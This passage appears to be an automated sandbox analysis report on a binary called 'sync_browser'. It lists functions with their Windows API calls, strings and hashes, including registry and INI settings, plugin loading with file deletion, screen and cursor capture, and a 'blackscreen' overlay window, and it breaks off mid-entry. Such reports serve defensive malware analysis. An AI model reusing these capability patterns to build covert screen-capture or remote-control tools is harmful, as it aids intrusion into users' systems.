Instruction Fuzzy Hash: 9B01E965A1995282FA69BB64E864BBDAB60EFC9F44FC50037DD0E469648F3DE104C720

Function 00007FF7D59F47E4 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7D59F4851
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7D59F4869
RtlVirtualUnwind.KERNEL32 ref: 00007FF7D59F48A3
IsDebuggerPresent.KERNEL32 ref: 00007FF7D59F48D9
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7D59F48E3
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7D59F48EE

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
Instruction ID: d9cf394869e93ffee90049aefdabb8a6c3cbb7238701d7ec57bf58f58357223b
Opcode Fuzzy Hash: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
Instruction Fuzzy Hash: A3314132618B8186D724DB25E4406AEB7A4FB84B58FD00136EE9D43B99DF38D545CB10

Function 00007FF7D59648B0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 00007FF7D5964915

Strings

0, xrefs: 00007FF7D59649B7

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Iconic
String ID: 0
API String ID: 110040809-4108050209
Opcode ID: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
Instruction ID: ddf7b0fc405736f11ca7b2cbae3ee252fb04fa682eb5f57af28e71d35b202c38
Opcode Fuzzy Hash: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
Instruction Fuzzy Hash: 2CA14A326046919BE75C9F39D5807ACB7E4FB48F48F84813ADB5D87644DB39E868CB20

Function 00007FF7D5987D50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987D89

Part of subcall function 00007FF7D5987650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987689
Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D59876DD
Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D5987722

Part of subcall function 00007FF7D59878E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D598792E
Part of subcall function 00007FF7D59878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7D598796A
Part of subcall function 00007FF7D59878E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7D59879B2

Strings

group3, xrefs: 00007FF7D5987DAC, 00007FF7D5987DE3
UseRegistry, xrefs: 00007FF7D5987D78
admin, xrefs: 00007FF7D5987D7F

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CreateQueryValue$FileModuleName
String ID: UseRegistry$admin$group3
API String ID: 1728753321-3776872688
Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
Instruction ID: 10d366a1a2871662520a23331f2251867b38e4fe9ccc60227ec0f22a0dde7ec1
Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
Instruction Fuzzy Hash: A6110C62A1859282EA24BB24F4A17FDA750FF88B48FC40037ED5D466A6CF3DE114D720

Function 00007FF7D5987EB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987EED

Part of subcall function 00007FF7D5987650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987689
Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D59876DD
Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D5987722

Part of subcall function 00007FF7D59877F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987840
Part of subcall function 00007FF7D59877F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7D598787D

Strings

locdom2, xrefs: 00007FF7D5987F06, 00007FF7D5987F1F
UseRegistry, xrefs: 00007FF7D5987EDC
admin, xrefs: 00007FF7D5987EE3

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$Create$FileModuleNameQueryValue
String ID: UseRegistry$admin$locdom2
API String ID: 1788981264-80830018
Opcode ID: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
Instruction ID: e6da626920df17548f45cf6458b7116bc6a14fff335b7e2e3a99746d9676ebda
Opcode Fuzzy Hash: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
Instruction Fuzzy Hash: 2F015E61A1895283FA25BB35A491BBDAB91EF88B08FC50433ED1D46592CF3DE105D630

Function 00007FF7D5987E10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987E50

Part of subcall function 00007FF7D5987650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987689
Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D59876DD
Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D5987722

Part of subcall function 00007FF7D59877F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987840
Part of subcall function 00007FF7D59877F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7D598787D

Strings

UseRegistry, xrefs: 00007FF7D5987E3F
locdom1, xrefs: 00007FF7D5987E69, 00007FF7D5987E82
admin, xrefs: 00007FF7D5987E46

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$Create$FileModuleNameQueryValue
String ID: UseRegistry$admin$locdom1
API String ID: 1788981264-2648182776
Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
Instruction ID: da3734ec3bb3c59e92027f407c39ec28ff7b03f3dbc587fbd2ef931ada1bcd75
Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
Instruction Fuzzy Hash: CD015E61A1895383FB24BB24E491BBDAA51EF98B08FC00037ED1D46692DF3DE548D670

Function 00007FF7D5987F50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987F8D

Part of subcall function 00007FF7D5987650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987689
Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D59876DD
Part of subcall function 00007FF7D5987650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7D5987722

Part of subcall function 00007FF7D59877F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5987840
Part of subcall function 00007FF7D59877F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7D598787D

Strings

UseRegistry, xrefs: 00007FF7D5987F7C
locdom3, xrefs: 00007FF7D5987FA6, 00007FF7D5987FBF
admin, xrefs: 00007FF7D5987F83

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$Create$FileModuleNameQueryValue
String ID: UseRegistry$admin$locdom3
API String ID: 1788981264-1943432916
Opcode ID: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
Instruction ID: c2dd7c33863b4eeb3b98f6b6d23d9ac5bd09c943e729b2d40bf469922f9315cb
Opcode Fuzzy Hash: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
Instruction Fuzzy Hash: A7015E61A1895283FA24FB35A491BBDEB91EF88B08FC50433ED1D46592CF3DE145D630

Function 00007FF7D595C210 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00007FF7D595C23F
FindFirstFileA.KERNEL32 ref: 00007FF7D595C24F
SetErrorMode.KERNEL32 ref: 00007FF7D595C25A
FindClose.KERNEL32 ref: 00007FF7D595C26D

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFindMode$CloseFileFirst
String ID:
API String ID: 2885216544-0
Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
Instruction ID: 312a53801417091918666000ecdb882c5057d749dfe6b737c22a813ba611ba06
Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
Instruction Fuzzy Hash: 59013035A1868587EA249B25B4546ADA3A1FB8CFE4FC04231EE6D53798CE3DD8458B10

Function 00007FF7D5935A60 Relevance: 50.9, APIs: 17, Strings: 12, Instructions: 154libraryloaderfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7D5935AAE
GetModuleFileNameA.KERNEL32 ref: 00007FF7D5935B07
LoadLibraryA.KERNEL32 ref: 00007FF7D5935B84
GetProcAddress.KERNEL32 ref: 00007FF7D5935BA8
GetProcAddress.KERNEL32 ref: 00007FF7D5935BC3
GetProcAddress.KERNEL32 ref: 00007FF7D5935BDE
GetProcAddress.KERNEL32 ref: 00007FF7D5935BF9
GetProcAddress.KERNEL32 ref: 00007FF7D5935C14
GetProcAddress.KERNEL32 ref: 00007FF7D5935C2F
GetProcAddress.KERNEL32 ref: 00007FF7D5935C4A
GetProcAddress.KERNEL32 ref: 00007FF7D5935C65
GetProcAddress.KERNEL32 ref: 00007FF7D5935C80
GetProcAddress.KERNEL32 ref: 00007FF7D5935C9B
GetProcAddress.KERNEL32 ref: 00007FF7D5935CB6
GetProcAddress.KERNEL32 ref: 00007FF7D5935CD1
FreeLibrary.KERNEL32 ref: 00007FF7D5935D33
DeleteFileA.KERNEL32 ref: 00007FF7D5935D49

Strings

RestoreBuffer, xrefs: 00007FF7D5935C3C
FreeBuffer, xrefs: 00007FF7D5935C57
Shutdown, xrefs: 00007FF7D5935BD0
TransformBuffer, xrefs: 00007FF7D5935C21
SetParams, xrefs: 00007FF7D5935BEB
Config, xrefs: 00007FF7D5935CC3
GetParams, xrefs: 00007FF7D5935C06
Description, xrefs: 00007FF7D5935BA1
Startup, xrefs: 00007FF7D5935BB5
CreatePluginInterface, xrefs: 00007FF7D5935C8D
Reset, xrefs: 00007FF7D5935C72
CreateIntegratedPluginInterface, xrefs: 00007FF7D5935CA8

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
API String ID: 1650122287-1031704962
Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
Instruction ID: 8c0a13c996c88c810361929459e816e8d37a52a225e176b4f93d65d8c463319c
Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
Instruction Fuzzy Hash: C6811A32919A8686EB15AF34E4543ED67A0FF88F98FC44132DD5D5B298DF78E244C320

Function 00007FF7D5960D40 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 239windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00007FF7D5960D8E
PtInRect.USER32 ref: 00007FF7D5960DCC
GetIconInfo.USER32 ref: 00007FF7D5960E05
GetSystemMetrics.USER32 ref: 00007FF7D5960E7F
GetSystemMetrics.USER32 ref: 00007FF7D5960E8C
SelectObject.GDI32 ref: 00007FF7D5960F37
CreateCompatibleDC.GDI32 ref: 00007FF7D5960F50
CreateCompatibleDC.GDI32 ref: 00007FF7D5960F60
SelectObject.GDI32 ref: 00007FF7D5960F70
SelectObject.GDI32 ref: 00007FF7D5960F80
BitBlt.GDI32 ref: 00007FF7D5960FCD
BitBlt.GDI32 ref: 00007FF7D5961017
SelectObject.GDI32 ref: 00007FF7D5961027
SelectObject.GDI32 ref: 00007FF7D5961033
SelectObject.GDI32 ref: 00007FF7D596103F
DeleteDC.GDI32 ref: 00007FF7D5961048
DeleteDC.GDI32 ref: 00007FF7D5961051
SelectObject.GDI32 ref: 00007FF7D5961067
DrawIconEx.USER32 ref: 00007FF7D59610AA
SelectObject.GDI32 ref: 00007FF7D59610BA
DeleteObject.GDI32 ref: 00007FF7D59610C9
DeleteObject.GDI32 ref: 00007FF7D59610D8
GdiFlush.GDI32 ref: 00007FF7D59610FE
DeleteObject.GDI32 ref: 00007FF7D59611B9
DeleteObject.GDI32 ref: 00007FF7D59611CC

Strings

F, xrefs: 00007FF7D5960FF1

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
String ID: F
API String ID: 2202639625-1304234792
Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
Instruction ID: d78398f9f693e8c6146d2ad77dbb92dcaf2dd1164cb4d6e18c75670749f6aaa7
Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
Instruction Fuzzy Hash: 4DC17E32A046A68FE754DF68D648DAEB7A9FF88B44F810537EE0953704DF789804CB20

Function 00007FF7D5933F30 Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 141libraryregistryloaderCOMMON

Download Yara Rule

APIs

LoadIconA.USER32 ref: 00007FF7D5933FA3
LoadCursorA.USER32 ref: 00007FF7D5933FC0
GetStockObject.GDI32 ref: 00007FF7D5933FD1
RegisterClassExA.USER32 ref: 00007FF7D5933FFB
GetSystemMetrics.USER32 ref: 00007FF7D593400B
GetSystemMetrics.USER32 ref: 00007FF7D593401B
GetSystemMetrics.USER32 ref: 00007FF7D593402B
GetSystemMetrics.USER32 ref: 00007FF7D5934036
GetSystemMetrics.USER32 ref: 00007FF7D5934041
GetSystemMetrics.USER32 ref: 00007FF7D593404C
AdjustWindowRect.USER32 ref: 00007FF7D5934088
CreateWindowExA.USER32 ref: 00007FF7D59340D0
LoadLibraryA.KERNEL32 ref: 00007FF7D59340E4
GetProcAddress.KERNEL32 ref: 00007FF7D59340F9
GetWindowLongPtrA.USER32 ref: 00007FF7D593410E
GetWindowLongPtrA.USER32 ref: 00007FF7D5934120
SetWindowLongPtrA.USER32 ref: 00007FF7D593413B
GetWindowLongPtrA.USER32 ref: 00007FF7D5934152
SetWindowLongPtrA.USER32 ref: 00007FF7D593416D
ShowWindow.USER32 ref: 00007FF7D593417F
SetWindowPos.USER32 ref: 00007FF7D59341BE

Strings

user32, xrefs: 00007FF7D59340D6
SetLayeredWindowAttributes, xrefs: 00007FF7D59340EF
P, xrefs: 00007FF7D5933F89
blackscreen, xrefs: 00007FF7D5933FD7
0, xrefs: 00007FF7D59341A3

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$MetricsSystem$Long$Load$AddressAdjustClassCreateCursorIconLibraryObjectProcRectRegisterShowStock
String ID: 0$P$SetLayeredWindowAttributes$blackscreen$user32
API String ID: 1337014749-2363801694
Opcode ID: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
Instruction ID: 0a1e6279525696b0f7cda0895ffb3cd37d2eef6ab6a26401078ce92da1341708
Opcode Fuzzy Hash: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
Instruction Fuzzy Hash: B5711A36A18B928AE714AF65F454A6EBBA0FF88B54F904136DE5D43798CF3CD044CB10

Function 00007FF7D5943210 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 133COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF7D5943243
